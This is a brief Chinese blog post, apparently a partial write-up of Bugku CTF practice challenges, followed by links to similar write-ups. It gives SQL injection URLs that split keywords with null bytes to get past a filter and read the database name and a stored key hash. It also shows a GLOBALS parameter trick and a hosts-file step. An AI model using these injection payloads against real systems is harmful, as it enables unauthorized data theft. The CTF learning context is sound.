bugku 部分writeup
2018-07-27 15:21
381 查看
域名解析
这道题皮的狠,不知道为什么我自己搭建的服务器,域名解析解决不了,但是只能痛过修改etc/hosts 添加 120.24.86.145 flag.bugku.com r然后浏览器浏览falg.bugku.com
sql注入测试
首先进行爆库查看
http://103.238.227.13:10087/?id=-1%20uni%00on%20sel%00ect%201%20,database()%23
http://103.238.227.13:10087/?id=-1%20uni%00on%20sel%00ect%201,hash%20fr%00om%20sql3.key%23
注入语句因为代码中限制了注入那么我们就使用00截断进行注入
变量1
http://120.24.86.145:8004/index1.php?args=GLOBALS
传入的参数
阅读更多
相关文章推荐
- 0ctf 部分web writeup.md
- SCTF-2014 writeup(部分)
- CCTF 2016 WriteUp(部分)
- 【bugku】【ZSCTF】【迷宫RE】Take The Maze WriteUp
- 【Writeup】第六季极客大挑战(部分题目)
- 实验吧隐写术部分writeup(1)
- 【Writeup】2017陕西网络空间安全技术大赛CSTC misc部分
- bugku CTF-练习平台 部分writeup
- bugkuctf练习平台reverse部分writeup
- [置顶] BugkuCTF——web篇writeup(持续更新)
- 【Bugku】这是一张单纯的图片?? 【writeup】
- 【Writeup】Boston Key Party CTF 2015(部分题目)
- 西普实验吧部分逆向题writeup(二)
- [Bugku]密码???[writeup]
- bugku杂项几题writeup
- 【bugku】做个游戏 writeup
- XDCTF 部分Writeup
- BugKu MISC 部分题目Write_up(一)
- IDF 实验室部分题目WriteUp